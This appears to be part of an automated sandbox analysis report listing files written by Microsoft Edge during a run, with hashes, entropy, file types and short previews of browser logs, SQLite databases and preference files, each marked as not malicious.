                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):332
                                                                                                                                                                                                                                                            Entropy (8bit):5.180694319836845
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:iOypTrq2PN723oH+TcwtpIFUt8pTOZmwOpRkwON723oH+Tcwta/WLJ:7ypHvVaYebmFUt8pq/OpR5OaYebaUJ
                                                                                                                                                                                                                                                            MD5:8344D621258A57118AE2DABE39C6908E
                                                                                                                                                                                                                                                            SHA1:ECD54721ABB9F3BCB3D119D270E7B017AFBEE5A8
                                                                                                                                                                                                                                                            SHA-256:5E861CCF80F94577E2CCAD81E16251D1FBADF73C6447CE8DBF46D1D46D320245
                                                                                                                                                                                                                                                            SHA-512:215AC72ED4B36426E8F8565BBD832721C52893F5EF8C9771C30A61FD87923303C48429FD5E4F2C1421593B4DA95E6FD723C00A0E819FFC263C0E94626CF7A6D7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:06.007 1884 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/03/07-15:40:06.007 1884 Recovering log #3.2025/03/07-15:40:06.008 1884 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):131072
                                                                                                                                                                                                                                                            Entropy (8bit):0.0033616753448762224
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:ImtVuXhLOOlJ:IiVux
                                                                                                                                                                                                                                                            MD5:1E58B518BD64607C4B665700134BD3C4
                                                                                                                                                                                                                                                            SHA1:A74DF48D50A4226ECF80CA6E8AEAB38D2DF5BAE5
                                                                                                                                                                                                                                                            SHA-256:4CF99A1A8498293D780B6EAE8DE1AF756142DD7213D4EF19097BC6E64E17809A
                                                                                                                                                                                                                                                            SHA-512:2953F8B3EB0B8500FBB2C3B6237A0FDFED9BC8F48BE40990C89A64E0025999922804042A91E35E669A10B1A2612B7EE02AC8E64F3A68B895B7F7EE8AB0CC7029
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:VLnk.....?........A..Z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 11, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):196608
                                                                                                                                                                                                                                                            Entropy (8bit):1.2677913461605224
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:7/2qOB1nxCkM2SA1LyKOMq+8iP5GDHP/0jMVumk:aq+n0J291LyKOMq+8iP5GLP/0h
                                                                                                                                                                                                                                                            MD5:B482D8161D3038B646100770B7EB10B5
                                                                                                                                                                                                                                                            SHA1:EC9ACD76B4BD61A3CDED20C7C39724566469E2BE
                                                                                                                                                                                                                                                            SHA-256:B5A885BA278EBCBE2C0561F949134A412DEB490506DBFCC204EBDC1DAD40EDF8
                                                                                                                                                                                                                                                            SHA-512:81F8B22A2FC53408B5A91964EE9A5D276B44691582C802BA78EAB091AB52491C0A8BEF2F3D44600328614B6EC5A4950BEE41F412052BE8496436BF785ACB9696
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ .......[...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                                                                                                            Entropy (8bit):0.41235120905181716
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB:v7doKsKuKZKlZNmu46yjx
                                                                                                                                                                                                                                                            MD5:981F351994975A68A0DD3ECE5E889FD0
                                                                                                                                                                                                                                                            SHA1:080D3386290A14A68FCE07709A572AF98097C52D
                                                                                                                                                                                                                                                            SHA-256:3F0C0B2460E0AA2A94E0BF79C8944F2F4835D2701249B34A13FD200F7E5316D7
                                                                                                                                                                                                                                                            SHA-512:C5930797C46EEC25D356BAEB6CFE37E9F462DEE2AE8866343B2C382DBAD45C1544EF720D520C4407F56874596B31EFD6822B58A9D3DAE6F85E47FF802DBAA20B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):11755
                                                                                                                                                                                                                                                            Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                            MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                            SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                            SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                            SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):13502
                                                                                                                                                                                                                                                            Entropy (8bit):5.264887926121283
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:st/J99QTryDigabatSuy9s95OaFvrE61ikN3Q82bV+F7cQAsOthUD+PscGJ:st/PGKSuys95OCDLWbGQQTOtiDZ
                                                                                                                                                                                                                                                            MD5:DDA7B8CC9FD477E56F47A105386EB619
                                                                                                                                                                                                                                                            SHA1:948D85041E49636FF05E0C89C6D21986A659A1B8
                                                                                                                                                                                                                                                            SHA-256:FE28B602AFCDDC480ED5369CD0724DEDFC7BEAFD509C0A4C210C04F3A968D455
                                                                                                                                                                                                                                                            SHA-512:13F441CAEC0671B1A930BBEECDA72E8D1E46D1B8A3856C12888309C5E8C8FD4195982E23DA2A7CA1F85A75EABC7C10E0CFA9C4323D301E5B188C3AD294C7B72B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13385827393488894","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):28672
                                                                                                                                                                                                                                                            Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                            MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                            SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                            SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                            SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):10135
                                                                                                                                                                                                                                                            Entropy (8bit):5.093621741707747
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:st/kd9s95OaFvrE9kN3Q82bV+F7cQAsOthUD+PscGJ:st/qs95OCD4bGQQTOtiDZ
                                                                                                                                                                                                                                                            MD5:4DF12E16BA7E2A7AF85870B7E7B42B28
                                                                                                                                                                                                                                                            SHA1:7E5F125C4CEECBB4BACE56917449B6B1630ABA6D
                                                                                                                                                                                                                                                            SHA-256:8BEEE8BF6CFF64406F62828CF7A1F38036E4882B4E370101EFEB163B528D63B0
                                                                                                                                                                                                                                                            SHA-512:1176A53C86754519812AFA7F418435ADF172153F6DD629BD6762A571363DAF75D409C45BBEEC63AE0D1D3E2C93E5FD6EB6476FE7AA77BF00364C2EEFC49815BE
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13385827393488894","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":914,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":70,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"li
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:.
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                                                                            Entropy (8bit):0.053875208764983265
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:GtStutJzcDW1StutJzcDCR9XCChslotGLNl0ml/Vl/XoQXEl:MtiDWrtiDCLpEjVl/PvoQ
                                                                                                                                                                                                                                                            MD5:52CA1F5AEB94C70219EA45C32EEDFC81
                                                                                                                                                                                                                                                            SHA1:16BBD2AD7703F65C2F21C568628727FA60CAB2BA
                                                                                                                                                                                                                                                            SHA-256:6E4F23C7ECFAAF5C6DFB889BDECD73B5B1CFC0E045336987FE8AD95AD78C7F8E
                                                                                                                                                                                                                                                            SHA-512:3A78EE18E7E4F9B983178E69DBD532B00AA20574973D4D80B78AB5B723C1B278C7B1831015ED6FDF8320F01D6CE3FB13CA34C438C9052CEF6045AC0223AFF1D2
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:..-...........................$J...V..=...2.&9..-...........................$J...V..=...2.&9........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):86552
                                                                                                                                                                                                                                                            Entropy (8bit):0.8719743208958547
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:eqzxjlO+H1qcbX+En9VAKAFXX+pRw2VAKAFXX+6xOqVAKAFXX+GnUYVAKAFXX+aI:e6xLV0xNs/cNswO5NshNsalW5
                                                                                                                                                                                                                                                            MD5:3A47B99D4BABC3DBC58EB54D7182B8E4
                                                                                                                                                                                                                                                            SHA1:E294B0E11496F73E1CB2D7342F6DEA72545B8FD1
                                                                                                                                                                                                                                                            SHA-256:B1C86AEAC099083EDCDB6883EB2DEDA31266BA8D45F63CA05E3F489EBF8B8540
                                                                                                                                                                                                                                                            SHA-512:986277A79242FEB3DEAAA3016CFA9AA5FF634E2CAB4658403246BE2765080F7BE6370CCA32A125B2FAC354B8682B3AC73FBF0B2BAC2018017F5420F9A5203382
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:7....-..........$J...V....M7'.z.........$J...V..h.IR..4.SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):628
                                                                                                                                                                                                                                                            Entropy (8bit):3.233180584774656
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:p9lc8QyOuuuuuuuuuuuuuuuuuuuuuuujO8r:pHay7P
                                                                                                                                                                                                                                                            MD5:277E62EBCD8ED4BB154EE663BA6D4D39
                                                                                                                                                                                                                                                            SHA1:D00D6480FBAA99AEDC8BE7F84605FFA73ED44BA7
                                                                                                                                                                                                                                                            SHA-256:67E3BF0BBB672759F4D36ED40213E62652C32ED6959EF044F3097A130E63096B
                                                                                                                                                                                                                                                            SHA-512:C51B92BF29CBC77E764A4D387C6CDCB481E8D4364FDDEA8466457A309F20604669F058D5F7A9AE51A5703D80C04A187592DEAE0BAF528BA6325DE54AB722E126
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:A..r.................20_1_1...1.,U.................20_1_1...1..$.0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............qi.K0................39_config..........6.....n ....1
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):325
                                                                                                                                                                                                                                                            Entropy (8bit):5.225279799987983
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:iOypXEFoAQ+q2PN723oH+TcwtfrK+IFUt8pXdngZmwOpXdCXWQQVkwON723oH+Tp:7ypXElvVaYeb23FUt8pXS/OpXhT5OaYq
                                                                                                                                                                                                                                                            MD5:A19E7955A2157B9D9D59231640970C34
                                                                                                                                                                                                                                                            SHA1:75003C3D0208D85DA57E79B657C835E5C2254D38
                                                                                                                                                                                                                                                            SHA-256:A17B6DD2FBBBE7531A694453F52DFFDEA3B7E98D753E0704771C270436B367B4
                                                                                                                                                                                                                                                            SHA-512:F6840983CE729CB440FC5BF2D01E7DE18C63EC4BF3A78324677E94E37A3A274560BE5DC8ECF378D4D5BB120DE45367628C4ED7C1DE31F97EC3C63415BC7A0594
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:07.496 238 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/03/07-15:40:07.512 238 Recovering log #3.2025/03/07-15:40:07.513 238 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):325
                                                                                                                                                                                                                                                            Entropy (8bit):5.225279799987983
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:iOypXEFoAQ+q2PN723oH+TcwtfrK+IFUt8pXdngZmwOpXdCXWQQVkwON723oH+Tp:7ypXElvVaYeb23FUt8pXS/OpXhT5OaYq
                                                                                                                                                                                                                                                            MD5:A19E7955A2157B9D9D59231640970C34
                                                                                                                                                                                                                                                            SHA1:75003C3D0208D85DA57E79B657C835E5C2254D38
                                                                                                                                                                                                                                                            SHA-256:A17B6DD2FBBBE7531A694453F52DFFDEA3B7E98D753E0704771C270436B367B4
                                                                                                                                                                                                                                                            SHA-512:F6840983CE729CB440FC5BF2D01E7DE18C63EC4BF3A78324677E94E37A3A274560BE5DC8ECF378D4D5BB120DE45367628C4ED7C1DE31F97EC3C63415BC7A0594
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:07.496 238 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2025/03/07-15:40:07.512 238 Recovering log #3.2025/03/07-15:40:07.513 238 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):850
                                                                                                                                                                                                                                                            Entropy (8bit):4.083903231942818
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:G0nYUtypD32m3yWlIZMBA5NgKIvB8SxX/Zs:LYUtyp5q55NvIp8SxX/Zs
                                                                                                                                                                                                                                                            MD5:51BB66C69D7962F330E6D110D3027EA0
                                                                                                                                                                                                                                                            SHA1:A720B775902D83ECC0C4D9291194891CD664C272
                                                                                                                                                                                                                                                            SHA-256:9A9EE523906C0E2DCDF70DBFB680DAA42310CDA31D780B944EA131DD53B1E138
                                                                                                                                                                                                                                                            SHA-512:4D8828BCD936F0D68C9070F35558DE30E71C669575DCEA39BD96CA94288C51173D1052D887A175809E25AE4C85197B8E643E3C98B18B2E94CF63BCA854C51913
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... ......................__global... .S.*..................__global... .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):343
                                                                                                                                                                                                                                                            Entropy (8bit):5.17066886350258
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:iOypXOHwQ+q2PN723oH+TcwtfrzAdIFUt8pXzRtYAgZmwOpXWdSQVkwON723oH++:7ypX/vVaYeb9FUt8pXzRtq/OpXW5OaY/
                                                                                                                                                                                                                                                            MD5:A840C53B0C4864B15E62267269F59D66
                                                                                                                                                                                                                                                            SHA1:3CEE58CDD8A6F72526E8C7B103CDF3AC1B68D126
                                                                                                                                                                                                                                                            SHA-256:44E905C5214F12E1F84A3F1A595A3F924BBE7F68FFCBAE88FAD8FF5EBF2A39F3
                                                                                                                                                                                                                                                            SHA-512:35E790BD520C0EC9262C83665248AD447261D880625ECE10A54D4DF9CC1B21429049E69902BEC1FEFE4A8A255832703659EA851D66FE4EC0D3DEB1DA47976686
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:07.307 238 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/03/07-15:40:07.354 238 Recovering log #3.2025/03/07-15:40:07.400 238 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):343
                                                                                                                                                                                                                                                            Entropy (8bit):5.17066886350258
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:iOypXOHwQ+q2PN723oH+TcwtfrzAdIFUt8pXzRtYAgZmwOpXWdSQVkwON723oH++:7ypX/vVaYeb9FUt8pXzRtq/OpXW5OaY/
                                                                                                                                                                                                                                                            MD5:A840C53B0C4864B15E62267269F59D66
                                                                                                                                                                                                                                                            SHA1:3CEE58CDD8A6F72526E8C7B103CDF3AC1B68D126
                                                                                                                                                                                                                                                            SHA-256:44E905C5214F12E1F84A3F1A595A3F924BBE7F68FFCBAE88FAD8FF5EBF2A39F3
                                                                                                                                                                                                                                                            SHA-512:35E790BD520C0EC9262C83665248AD447261D880625ECE10A54D4DF9CC1B21429049E69902BEC1FEFE4A8A255832703659EA851D66FE4EC0D3DEB1DA47976686
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:07.307 238 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2025/03/07-15:40:07.354 238 Recovering log #3.2025/03/07-15:40:07.400 238 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):120
                                                                                                                                                                                                                                                            Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                            MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                            SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                            SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                            SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                                                                                                            Entropy (8bit):2.6612262562697895
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:NYLFRQZ:ap2Z
                                                                                                                                                                                                                                                            MD5:B64BD80D877645C2DD14265B1A856F8A
                                                                                                                                                                                                                                                            SHA1:F7379E1A6F8CE062E891C56736C789C7EA77CD6A
                                                                                                                                                                                                                                                            SHA-256:83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
                                                                                                                                                                                                                                                            SHA-512:734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:117.0.2045.55
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):41976
